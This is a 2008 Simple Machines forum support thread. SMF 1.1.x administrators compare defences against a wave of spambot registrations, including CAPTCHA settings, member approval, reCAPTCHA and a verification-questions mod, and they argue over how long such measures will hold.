Quote from: Schoolbusforum on November 21, 2008, 04:39:56 PM
I shut down my site until news comes that the SPAM has stopped
lol... I guess you'll never be running your site again then...
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: webmistress on November 21, 2008, 05:34:50 PM
Not too long ago, the bots attacked Vbulletin and it was not just spamm names but hardcore porn. That was much tougher to battle.

I'm trying kjell's suggestions. Thanks.
Title: Re: Tidal wave of spambotbots attacks SMF 1.1.x - How to protect your forum
Post by: mistryboy on November 21, 2008, 07:04:46 PM
Quote from: rebelsgirl on November 11, 2008, 10:08:32 PM
I am using 1.1.7 and *touch wood* haven't had a problem with the spam bots yet.

with my forum is all ok no spam  used 1.1.7

grts
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: txleo on November 22, 2008, 11:58:23 AM
Thanks for posting those registration bot checks! This will help.

reCAPTCHA for SMF : returned an error on the registration file so I did not install it.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 22, 2008, 12:07:41 PM
Quote from: txleo on November 22, 2008, 11:58:23 AM
Thanks for posting those registration bot checks! This will help.

reCAPTCHA for SMF : returned an error on the registration file so I did not install it.

I suggest that you post a support request in the reCAPTCHA modification support topic and I'm sure the author will be happy to help you get it working. :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Storman™ on November 22, 2008, 12:17:57 PM
QuoteIt stopped 3 days ago when I simply changed settings to:
Member Activation
Medium Password Strength
High complexity on image verfica

Same here. I did the same and it all seems to have gone quiet now  :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: aianeo on November 22, 2008, 04:15:28 PM
High complexity image verification is the key. Fixed our spam on 1.1.7. I may add "Am I Human" anyway.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: folkandfaith on November 22, 2008, 05:09:44 PM
Quote from: Schoolbusforum on November 21, 2008, 04:39:56 PM
I shut down my site until news comes that the SPAM has stopped

I don't know what else to do either. I have had to do the same thing
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on November 22, 2008, 09:37:36 PM
Quote from: folkandfaith on November 22, 2008, 05:09:44 PM
I don't know what else to do either. I have had to do the same thing

Follow the tips in the first post. Any of the solutions should stop the problem. Changing the registration form a little from the default will stop it.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: folkandfaith on November 22, 2008, 11:44:03 PM
Quote from: Motoko-chan on November 22, 2008, 09:37:36 PM
Quote from: folkandfaith on November 22, 2008, 05:09:44 PM
I don't know what else to do either. I have had to do the same thing

Follow the tips in the first post. Any of the solutions should stop the problem. Changing the registration form a little from the default will stop it.

how do I change the registration so that I have to authorize someone before they are active?

The ReCapthca thing created a whole string of gobeldygook html or such at the top of the forum so I had to un-install it as fast as it was installed.

I tried changing the captcha thing as it is currently and teh password strength but it didn't do anything to stop them.

They are throwing links with our forums name in it and they all either go to Canadian Rx drug companies or weirdo animal porn sites, definitely the opposite of the sort of image our site tries to create.

Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: forumite on November 22, 2008, 11:49:15 PM
Quotehow do I change the registration so that I have to authorize someone before they are active?

Go to Admin|Registration|Settings, select 'Member approval' from the drop-down box, then scroll to the bottom of the page and click 'Save'.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Xavi-Nena on November 23, 2008, 02:52:37 AM
I have had these same issues and we had literally a hundred new registrations a day .... the registrations stopped once I changed the Medium Password Strength to High complexity on image verification.

However I always had a form that was by admin manual approval and require a welcome email with name, address and photos to introduce themselves....so that a spambot could not do...at least not yet that i know of anyway but they still managed to wreck my files and screw with my avatar images and phpchat and ... well they broke my board...

but i wanted to add that changing from medium to high complexity on image verification worked to stop the mass new registrations.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: jimtrap on November 23, 2008, 02:12:04 PM
Just stating that I'm getting hammered with the spammers as well in order to keep this thread close to the top.

I did the age verification thing and that didn't help, so I'm just doing the admin approval for now as I have a fairly small forum.

As my forum is really only aimed at members in the US, I banned most IP's in the rest of the world and that seems to have really slowed it down as well.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Col on November 23, 2008, 04:20:28 PM
Quote from: NenaGb on November 23, 2008, 02:52:37 AM
I have had these same issues and we had literally a hundred new registrations a day .... the registrations stopped once I changed the Medium Password Strength to High complexity on image verification.

However I always had a form that was by admin manual approval and require a welcome email with name, address and photos to introduce themselves....so that a spambot could not do...at least not yet that i know of anyway but they still managed to wreck my files and screw with my avatar images and phpchat and ... well they broke my board...

but i wanted to add that changing from medium to high complexity on image verification worked to stop the mass new registrations.

I believe this is because you are running SMF1.1.6 or earlier. I had a similar attempt, but, fortunately, I had already upgraded to SMF1.1.7.

http://secunia.com/advisories/32516/ (http://secunia.com/advisories/32516/)

If you have not done so already, updrade to SMF1.1.7.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 23, 2008, 04:35:44 PM
Please be advised the Custom Team just approved my new modification package intended to fix this spambot problem for once and for all:

Anti-Spam Verification Questions for SMF 1.1.7 (http://custom.simplemachines.org/mods/index.php?mod=1516) (Mod Site listing)
Anti-Spam Verification Questions for SMF 1.1.7 (http://www.simplemachines.org/community/index.php?topic=276309.0) (support topic)

QuoteAdds SMF 2.0's anti-spam verification questions to SMF 1.1.7. You can add up to 5 questions which must be answered by the applicant before registration is permitted.

Here are some examples of types of questions that could work. I usually put a hint in the question so that humans can easily figure out what to enter. Spambots on the other hand don't understand human hints. :P

Examples:

  • What year is it? (4 digits)
  • Are you a robot? (yes or no)
  • Please leave this answer blank.
I wrote this modification especially just for all of you 1.1.7 forum operators to see if I can solve your spambot problem once and for all. I've been chuckling as I've been writing my codes, thinking about all the probably weeks of effort that the spambot programmers put into their spammer scripts, thinking that with a few days worth of my own labor I may have possibly wiped them out completely! :D

So those of you who have shut down your forums, please check out this modification and see if it fixes your problem.

If this modification works as well as I think, then IMO there are two ultimate defenses from spambots: this mod and Motoko-Chan's reCAPTCHA mod. I don't see how the bots could get past either one of them. :)

I'm on a mission from God. I'm hoping this mod will kill the spambots and make the botmasters weep! :P :D
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Col on November 23, 2008, 04:54:29 PM
Here's what I did:     The reason for the Any Thread mod is to protect Newbies from viewing any spam. Some of the spam we received was pretty extreme in content, but this mod means that spammers and genuine members can only view their own threads. Of course, members with a post count of '1' or more, do not even know that the approval board exists (it is not accessable to guests either).

I also added a sticky within Approval board to explain why it is there. I might be helpful to include a link directly to the 'New Topic' form. Stickies, with the Any Topic mod, are viewable by all. The sticky is locked to stop spam from being posted there.

All this worked well. Since all the forum's main boards increase the post count of members, moving a thread to a normal forum board increases the post count of the new member. This means that it is usually unnecessary for their post count to be manually increased by an admin.

Although this resolved the problem, I became tired of all the bogus registrations. Increasing the CAPTCHA codes to maximum did make a big difference, but did not stop the spam entirely. At the same time, at the maximum setting, I found the CAPTCHA codes difficult to read, and so I assumed so would most of my potential members. I've since upgraded the registration system with reCAPTCHA, and couldn't be more pleased. It stops the bots in their tracks, and is easier for humans to read at the same time. I'm keeping the approval board for now though, just in case. Some of the attempted spam was highly offensive, so a manual check is still desireable.

Edit: I also denied the ability of Newbies to send PMs and view the profiles of other members, just to be on the safe side.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 23, 2008, 05:07:12 PM
That's a clever means of dealing with the spambots, and thank you for explaining it.

As I've already said, I consider the reCAPTCHA mod to be unbeatable, at least with today's spambots and today's reCAPTCHA. I'll be surprised if a single bot gets past it on a single forum. I think for the present that is impossible, unless they are "humbots" or humans paid to do bot work. There are some of those where people in countries with low standards of living and low wages are paid to do nothing but type in the CAPTCHA letters (the bot does the rest automatically). There is little you can do in that case.

My new Anti-Spam Verification Questions mod should be equally secure, but for different reasons. In fact in the case of humbots it might even have an advantage if the humbots don't speak the forum's language. It's one thing to learn 26 English letters and quite another to learn to communicate in English, for example (if the forum's language is English). I think the Anti-Spam Verification Questions might even work fine with CAPTCHA set on medium, and that's SMF's native CAPTCHA system. It might even work on low, relying on the questions rather than the CAPTCHA. That might be good in some forums where for example their members are senior citizens with poor eyesight. I know I've had troubles with getting some CAPTCHAs right myself. :)

Note that the Anti-Spam Verification Questions can be in any language, so it is not restricted only to English forums.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: forumite on November 23, 2008, 05:18:15 PM
A big thanks for the mod Deprecated. I haven't been hit (yet), but I plan to install your mod ASAP.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: MrPhil on November 23, 2008, 07:55:35 PM
Quote from: Deprecated on November 23, 2008, 05:07:12 PM
I think for the present that is impossible, unless they are "humbots" or humans paid to do bot work. There are some of those where people in countries with low standards of living and low wages are paid to do nothing but type in the CAPTCHA letters (the bot does the rest automatically). There is little you can do in that case.

My new Anti-Spam Verification Questions mod should be equally secure, but for different reasons. In fact in the case of humbots it might even have an advantage if the humbots don't speak the forum's language. It's one thing to learn 26 English letters and quite another to learn to communicate in English, for example (if the forum's language is English).

Well, humbots don't necessarily even have to be low paid people in third-world countries. I've heard of CAPTCHA images being immediately transferred to porn sites, where horny guys trying to get in will break the images quickly. If they assume it's a real CAPTCHA, they may even give the correct interpretation of it. The only defense against this would be to have a strict (and very short) time limit for the user to enter the answer.

Quote
That might be good in some forums where for example their members are senior citizens with poor eyesight. I know I've had troubles with getting some CAPTCHAs right myself. :)

Of course, it's an arms race of more sophisticated CAPTCHAs against more sophisticated crackers (machine vision/A.I.) until you get to the point where too many of your intended audience can't decipher the images. And yes, I too sometimes have trouble with CAPTCHA images (is 50 old?).

Quote
Note that the Anti-Spam Verification Questions can be in any language, so it is not restricted only to English forums.

You have to be careful with natural language questions and answers. First, you might unwittingly introduce cultural biases (e.g., "What are colors of the Flag?" The U.S. flag? Another country's flag?).  Math questions spelled out COBOL style might not slow down the bots for long -- there are only so many ways to phrase an operation (minus, subtract, take away from, reduce by, plus, add to, augment). Using tricky phrasing and obscure words will eventually start to trip up your target audience, and you have to be able to generate so many permutations of sentences that bots won't be able to store each case (sentence template). Plus, user responses may have many subtle differences (spelling, capitalization, etc.) that you have to allow for. I remember being given a PC version of "Jeopardy!" a couple of decades ago -- I only played it a few times, because it was so frustrating to give the correct answer, but it didn't exactly match the canned answer!

It may well get to the point that all new users have to be on "probation" until they've shown that they are behaving themselves, and this may include a "why I want to join" essay.

For pure bots (non-human), we may be able to trip them up for a while, such as by randomly introducing hidden questions (constantly changing) that shouldn't be seen (and answered) by a human, but who knows how long that will succeed!
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: catfished on November 23, 2008, 08:19:01 PM
I don't want to sound smug but I really don't understand why so many of you are having so many problems. I am the starter of the original thread about this: http://www.simplemachines.org/community/index.php?topic=273648.msg1792741#msg1792741 and I simply upped the image verification to high and added an age limit. All spam registrations immediately ceased on all my SMF forums (all 1.1.7) after doing these two simple things.

Now 11 days have passed without a single successful spam
registration so it should work for those running 1.1.7.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Burke ♞ Knight on November 23, 2008, 08:26:00 PM
Quote from: catfished on November 23, 2008, 08:19:01 PM
I don't want to sound smug but I really don't understand why so many of you are having so many problems. I am the starter of the original thread about this: http://www.simplemachines.org/community/index.php?topic=273648.msg1792741#msg1792741 and I simply upped the image verification to high and added an age limit. All spam registrations immediately ceased on all my SMF forums (all 1.1.7) after doing these two simple things.

Now 11 days have passed without a single successful spam
registration so it should work for those running 1.1.7.

Do not forget the following:

1. Some members are not as experienced with settings.
2. Some members are actually being attacked by other spambots that may not be attacking other people, including you.
3. Some people may be running other mods and such that replace the normal SMF verification system.
4. Some people may not be able to set the verification to high, as that can cause problems for their soon to be valid members who may not be able to see to well.

We all have reasons why some things work, or do not work for us.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 23, 2008, 08:48:51 PM
Quote from: MrPhil on November 23, 2008, 07:55:35 PMOf course, it's an arms race of more sophisticated CAPTCHAs against more sophisticated crackers (machine vision/A.I.) until you get to the point where too many of your intended audience can't decipher the images. And yes, I too sometimes have trouble with CAPTCHA images (is 50 old?).

Old is relative. It is what happens if you don't have the decency to die young. :)

Quote from: MrPhil on November 23, 2008, 07:55:35 PMYou have to be careful with natural language questions and answers. First, you might unwittingly introduce cultural biases (e.g., "What are colors of the Flag?" The U.S. flag? Another country's flag?).  Math questions spelled out COBOL style might not slow down the bots for long -- there are only so many ways to phrase an operation (minus, subtract, take away from, reduce by, plus, add to, augment). Using tricky phrasing and obscure words will eventually start to trip up your target audience, and you have to be able to generate so many permutations of sentences that bots won't be able to store each case (sentence template). Plus, user responses may have many subtle differences (spelling, capitalization, etc.) that you have to allow for. I remember being given a PC version of "Jeopardy!" a couple of decades ago -- I only played it a few times, because it was so frustrating to give the correct answer, but it didn't exactly match the canned answer!

Well that is the beauty of my new mod. Every forum owner gets to decide for themselves what the questions (and answers) are. But your points are all good ones, and the forum owners should take your advice.

I'm providing the mod. There are NO questions in the mod. Each forum operator must generate their own questions, and those questions must make sense in their own culture.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: catfished on November 23, 2008, 11:23:56 PM
Quote from: BurkeKnight on November 23, 2008, 08:26:00 PM

Do not forget the following:

1. Some members are not as experienced with settings.
2. Some members are actually being attacked by other spambots that may not be attacking other people, including you.
3. Some people may be running other mods and such that replace the normal SMF verification system.
4. Some people may not be able to set the verification to high, as that can cause problems for their soon to be valid members who may not be able to see to well.

We all have reasons why some things work, or do not work for us.

All very good points, thanks for waking me up. ;D It's never as simple as I made it sound, I should know better. :-[
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: societyofrobots on November 24, 2008, 01:37:07 AM
QuoteI simply upped the image verification to high and added an age limit. All spam registrations immediately ceased on all my SMF forums (all 1.1.7) after doing these two simple things.

Now 11 days have passed without a single successful spam registration so it should work for those running 1.1.7.
I don't think it will take long for the spammers to figure that out and mod the bots . . . I only see it as a temp fix. I'm sure the spammer is even reading this thread and making the changes as we speak.


Deprecated, what would stop the spammer from programming your mod into the bot? It wouldn't take the spammer more than 10 minutes figuring out all the questions/answers and adding it to the bot, no? It'll slow him down, but definitely not stop him in the long term.


There needs to be a much greater variety in anti-spam mods out there. A spammer can defeat one or two mods, but the effort to create a bot that can defeat ever-improving ten or more mods might actually be cost prohibitive . . .
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Xavi-Nena on November 24, 2008, 01:39:28 AM
1st - i dont think it was the version of my smf because i was using 1.1.7

2nd - i had almost as col suggested where all members had to post welcome introduction message before being able to access other boards.

Let me say my spam was not im message topics on the board but on my template files. Im not expert but i thought they had to have access to admin panel for that? I did not approve anyone that did not send welcome email to me first why they wanted to join and then no one who registered was able to view the boards until they make introduction post .

Again my spam was not as actual post topics but w/in the files of my pages.

Im not sure if that helps any but I figured I would mention it.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: metallica48423 on November 24, 2008, 01:50:52 AM
Quote from: societyofrobots on November 24, 2008, 01:37:07 AM
QuoteI simply upped the image verification to high and added an age limit. All spam registrations immediately ceased on all my SMF forums (all 1.1.7) after doing these two simple things.

Now 11 days have passed without a single successful spam registration so it should work for those running 1.1.7.
I don't think it will take long for the spammers to figure that out and mod the bots . . . I only see it as a temp fix. I'm sure the spammer is even reading this thread and making the changes as we speak.


Deprecated, what would stop the spammer from programming your mod into the bot? It wouldn't take the spammer more than 10 minutes figuring out all the questions/answers and adding it to the bot, no? It'll slow him down, but definitely not stop him in the long term.


There needs to be a much greater variety in anti-spam mods out there. A spammer can defeat one or two mods, but the effort to create a bot that can defeat ever-improving ten or more mods might actually be cost prohibitive . . .

This is true -- it could be made to have the questions and answers stored... but can it possibly have EVERY possible verification question an admin might use preprogrammed into it?  realistically, its an endless pool of possibilities, and thats where the strength in this method lies.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: societyofrobots on November 24, 2008, 07:24:25 AM
Quoterealistically, its an endless pool of possibilities, and thats where the strength in this method lies.
*If* I was a spammer, I'd write a script that would ask me (the human) to answer any new questions it finds, while automatically answering ones it already knows the answers to.

So if I were to spam 100 forums, and all 100 had 5 questions, and each question took 5 seconds of thought . . . it'll take me 41 minutes to answer all of them. I don't expect many forum owners to have that many questions, or even change them that often . . . The time it takes to change your 5 questions would be much greater than the time it'd take to answer the 5 new ones, given the script automates most of it.

And since its easy questions (yes or no, or some number), I'm sure about 10% can be easily guessed by brute force.

I think the best defense is not to have a monoculture of defenses.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: swyl on November 24, 2008, 07:31:17 AM
18 pages wow... Just gonna add my two penneth  ::)

I recently changed registration to include email activation but a latest sign up complained through another member that she couldnt get the email acti. So I tried it myself and it seems she is right... I indeed got no acti email. But the bots are still getting in.

I'm not being funny but how does that work ? Real people arent getting the acti email but the bots are ?????? wow.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 24, 2008, 07:56:40 AM
Quote from: societyofrobots on November 24, 2008, 01:37:07 AMDeprecated, what would stop the spammer from programming your mod into the bot? It wouldn't take the spammer more than 10 minutes figuring out all the questions/answers and adding it to the bot, no? It'll slow him down, but definitely not stop him in the long term.

Although Justin answered this, let me add my own version.

How many thousands of SMF forums are there? Let's just say 10,000 although I believe that is far too low a number. Let's say that most of them pick different questions, so perhaps there are 40,000 different question/answer sets. How could it be possible for the botmasters to build up a list of the correct answers for all those questions? And they change every day too! If you found that spammers were blowing past your questions, just change them!

You say what if there is a human in the loop? Well that's the problem, but it's not our problem, it's the bot master's problem. The only reason the spammers turned into a tidal wave is because the process was fully automated. I'm pretty sure they would be running a multi-threaded client, meaning that while they are spamming your forum they are also joining up with or spamming 10, 20 or 50 other forums at the same time. That's what creates the tidal wave.

But if a bot master has to sit there and answer questions all day he can't possibly bother 50 forums at the same time. Instead of running through our forums he'll be crawling through them, and dragging a ball and chain on one ankle. It is not practical for the bot master to spam our forums unless he can do it with no more effort than turning on the robot. If he has to mind the bot all day while it's doing its dirty work he is going to go nuts and finally he'll put in a setting that tells the bots to ignore SMF forums because they can't be spammed or they aren't worth the trouble.

That is why I think it will work. There's too many different possible questions, they'll never succeed in making a list of them all, the list will change on a daily basis, and the spambots are not practical if they require human operators.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: societyofrobots on November 24, 2008, 08:19:14 AM
QuoteBut if a bot master has to sit there and answer questions all day he can't possibly bother 50 forums at the same time. Instead of running through our forums he'll be crawling through them, and dragging a ball and chain on one ankle. It is not practical for the bot master to spam our forums unless he can do it with no more effort than turning on the robot. If he has to mind the bot all day while it's doing its dirty work he is going to go nuts and finally he'll put in a setting that tells the bots to ignore SMF forums because they can't be spammed or they aren't worth the trouble.
I completely agree, its about making it less worth their effort by giving them more work . . . however I'm unconvinced they won't adapt or that we've finally solved the worlds spam problem :P

I just see this as a one up in the arms race for now . . . but I think they'll one up us in a year or so too . . .
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: swyl on November 24, 2008, 10:15:28 AM
Does anyone know about this ???

QuoteReal people arent getting the acti email but the bots are ?????? wow.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: SlammedDime on November 24, 2008, 10:39:38 AM
It's very easy to 'pipe' emails through a script, be it php, cgi, perl, whatever, and have that script parse out the url, visit it, thus activating the account.  Perhaps adding visual verification to the verification of email would be a good idea.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: societyofrobots on November 24, 2008, 11:24:26 PM
QuotePerhaps adding visual verification to the verification of email would be a good idea.
A great idea, and it'd help too . . . but a lot of email services block images by default for security reasons (like gmail). Bad enough that hotmail and yahoo considers all SMF email spam . . .

Visitors to my site are considered above average intelligence (robot building forum) . . . but for others the extra image step might be too much . . .
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: mashby on November 24, 2008, 11:31:24 PM
Upping the image verification has nothing to do with email services...it's an on-screen thing. If your above average intelligence visitors cannot read the high verification image, maybe you should consider this mod:
http://custom.simplemachines.org/mods/index.php?mod=1516

Ask them something like, what is 2+2.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: societyofrobots on November 25, 2008, 12:31:51 AM
mashby you misinterpreted me entirely . . . ok i'll reword . . .

Google and other email services remove images from emails as a security precaution. For a non-techie to get a confirmation email with an image contained in it, and requires that non-techie to see that image but the email service disables the image by default, this could be a problem.

My site visitors are more intelligent on average and most won't have that problem - they can just enable the image and understand why too. However if your forum is about gardening, or train collecting, or socializing, by default those visitors would be non-techies.

SlammedDime had a good suggestion, but I can see user problems with it for non-techie forums.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: mashby on November 25, 2008, 12:39:59 AM
You misinterpreted the image verification. It's not done in an email, it's done at the site.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: metallica48423 on November 25, 2008, 04:46:37 AM
I believe he meant in some sort of intermediate confirmation page with a visual verification image

you really can't utilize PHP code or dynamic images EASILY within an email ;)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Ashdaw on November 25, 2008, 07:05:14 AM
I had a total of 57 users on my Forum yesterday. I have taken ALL precautions and I cannot understand WHY they are trying to access my site, It is just a small friendly community? Maybe I haven't done enough yet? I did add the are you human one and tried to add the Question one but got a fail message. :(
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: SlammedDime on November 25, 2008, 08:00:40 AM
Nothing is going to prevent them from looking at your site... it's the internet.  We're only trying to prevent them from registering on it.

If you're getting failed messages when trying to install mods, you should make posts in the support topic regarding those mods.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Deprecated on November 25, 2008, 08:14:57 AM
Quote from: Ashdaw on November 25, 2008, 07:05:14 AM
I had a total of 57 users on my Forum yesterday. I have taken ALL precautions and I cannot understand WHY they are trying to access my site, It is just a small friendly community? Maybe I haven't done enough yet? I did add the are you human one and tried to add the Question one but got a fail message. :(

Uninstall the Are You Human? mod, then install the Anti-Spam Verification Questions. The questions are far more powerful because they vary from forum to forum to forum, so the botscripts cannot be programmed to answer the questions. However, there are no indications that the Are You Human? mod has been breached yet. Probably either one would work, but the second is more powerful and is likely to resist breaching far longer, if at all.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Bazil Greyson on November 25, 2008, 09:33:04 AM
This link, in the footer of my site has helped greatly

http://english-138309221408.spampoison.com/

I highly recommend checking out www.spampoison.com
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: hillrunr on November 25, 2008, 01:17:05 PM
Just want to thank Deprecated and the rest for the very educational topic.

I already had an age limit (13) and was still getting the spambots coming through. I changed visual verification complexity from medium to high and changed method from immediate to member approval. Not one spambot has gotten through since. I changed method back to immediate and still nothing.

I also did install reCAPTCHA with plans of implementing it later but was getting tons of undefined index error messages. For now, I uninstalled but did not delete reCAPTCHA. Seeing as things are good now, I'll take up that issue later and, if needed, post on its support topic.

Once again, thank you to Deprecated and everyone else.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: kaseymo on November 27, 2008, 11:53:54 AM
I too had many unwelcome new registrants at the forum associated with the selskc.net site.  I implemented High on image verf and put in a min age of 10. That took care of the *.ru  applicants . I then backed off the age check and for 3 days not the High setting on image verf has been sufficient to keep the outsiders out.

I still don't know 100% what the goal was and is for this type of attack. I could see that some listed various websites in their profile so though it was an ad campaign or an attempt to increase Google page rank by creating hundreds of inbound links but not all the new members listed an website via their profile.  As far as I could tell none of the "bots" posted to the Forum.

Was there/is there other mischief afoot?  Should I be examining other aspects of the site - where to look and for what?  Might the site have been compromised in some manner I'm not aware of while these bogus registrations did have access to the SMF forum.

I purged all of them and by instituting Member Approval and HIGH on image verf the onslaught has been halted. 

Gist of this - High on Image Verf did the job as of 11-22-08 anyway.

Dick Williams
Kansas City MO
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Col on November 27, 2008, 06:02:58 PM
Quote from: folkandfaith on November 22, 2008, 11:44:03 PM
Quote from: Motoko-chan on November 22, 2008, 09:37:36 PM
Quote from: folkandfaith on November 22, 2008, 05:09:44 PM
I don't know what else to do either. I have had to do the same thing

Follow the tips in the first post. Any of the solutions should stop the problem. Changing the registration form a little from the default will stop it.

how do I change the registration so that I have to authorize someone before they are active?

The ReCapthca thing created a whole string of gobeldygook html or such at the top of the forum so I had to un-install it as fast as it was installed.

I tried changing the captcha thing as it is currently and teh password strength but it didn't do anything to stop them.

They are throwing links with our forums name in it and they all either go to Canadian Rx drug companies or weirdo animal porn sites, definitely the opposite of the sort of image our site tries to create.

I had a similar problem - for some reason the language modifications were added after the ?> at the bottom of the language file. Simply edit the file so that '?>' is the very last line, and all should be well. ;)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: societyofrobots on November 28, 2008, 02:38:21 AM
QuoteYou misinterpreted the image verification. It's not done in an email, it's done at the site.
Mashby I think you are confused :P
I was referring to SlammedDime's comment which refers specifically to image verification done in email:

Quote from: SlammedDime on November 24, 2008, 10:39:38 AM
It's very easy to 'pipe' emails through a script, be it php, cgi, perl, whatever, and have that script parse out the url, visit it, thus activating the account.  Perhaps adding visual verification to the verification of email would be a good idea.


Anyway, in an earlier post in this thread I noted these bots attempting to run strange url commands on my forum, including attempting to download my entire forum database. I since blocked those IPs, and after a week no other IPs have caused the problem. As you can see, the bots are fairly aggressive (the IP followed by # of attempts):
IP: 65.55.230.188     37
IP: 72.30.142.218    0
IP: 65.55.209.32    168
IP: 65.55.209.25    309
IP: 72.30.142.163    0

I highly recommend everyone checking their Forum Error Log for this, and even blocking these IPs. Better to block now before they improve their hack attempts!
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Akyhne on November 28, 2008, 08:58:01 AM
Ha, ha, ha

Read the blog called "Spammers Wanted" in the Coppermine Photo Gallery blog. I really like that guy :)

http://coppermine-gallery.net/
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: shads on November 28, 2008, 03:45:31 PM

I enabled the recaptcha mod .. still some bots can register ...
my smf version is 1.1.7  ... some bots even posted about this xrumer information in the forum...
anyone with better solution?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: ddarrell on November 28, 2008, 09:49:40 PM
Quote from: Bazil Greyson on November 25, 2008, 09:33:04 AM
This link, in the footer of my site has helped greatly

http://english-138309221408.spampoison.com/

I highly recommend checking out www.spampoison.com

This is a cleverly disguised scam to sell very poor protection to your users.  Look at it in IE without filtering scripts.   Where are the "bait" email addresses it says will confound the spam-bots? It is all a hoax. 

Sorry.

IMO,
ddarrell


Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on November 28, 2008, 10:12:12 PM
Quote from: ddarrell on November 28, 2008, 09:49:40 PM
This is a cleverly disguised scam to sell very poor protection to your users.  Look at it in IE without filtering scripts.   Where are the "bait" email addresses it says will confound the spam-bots? It is all a hoax. 

Even if it had addresses (and I have seen services that have tons of fake addresses hidden on pages), it doesn't help much at all. Modern spammers quickly remove bogus addresses from their lists. Whatever "damage" they do won't last.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: biodieselrick on November 30, 2008, 02:33:42 AM
Well it works for me. I've gotten like 3 spam posts in the last year and maybe 3-5 dead registrations a day.

1) require email verification.
2) Ban every IP not assigned through ARIN.net
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: RawDepth on November 30, 2008, 09:04:47 AM
Lots of bots have registered on my forum but only two or three have returned to actually make a post.

I've noticed that each of those bot posts were in the first forum on my board. The xrumor script must simply choose the first forum room at the top of the site and stick the new post in there. I wonder if setting the permissions more strictly for that forum only would foil all spambot postings?

EDIT:
BTW, I am not asking for help. I think I already cured my bot problem by following tips in this thread. I was just making an observation.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: tourneymanager on December 01, 2008, 10:19:35 PM
Quote from: RawDepth on November 30, 2008, 09:04:47 AM
Lots of bots have registered on my forum but only two or three have returned to actually make a post.

I've noticed that each of those bot posts were in the first forum on my board. The xrumor script must simply choose the first forum room at the top of the site and stick the new post in there. I wonder if setting the permissions more strictly for that forum only would foil all spambot postings?

EDIT:
BTW, I am not asking for help. I think I already cured my bot problem by following tips in this thread. I was just making an observation.

I just found this board and like the rest of you, have many unwanted registrations. Not a single post, though. My first board is read-only so only admins and moderators can post to it. Maybe you're on to something.

By the way, I just set my captcha to high. We'll see if that prevents the unwanted registrations.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Burke ♞ Knight on December 01, 2008, 10:40:18 PM
On all my sites, the first board is always News & Announcements. Only staff can post there, read only to regular members. So there may very well be something to this, as I have not gotten spam posts on my forums. Yet I do have a few new members that either don't post, or don't activate.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: tourneymanager on December 01, 2008, 10:52:22 PM
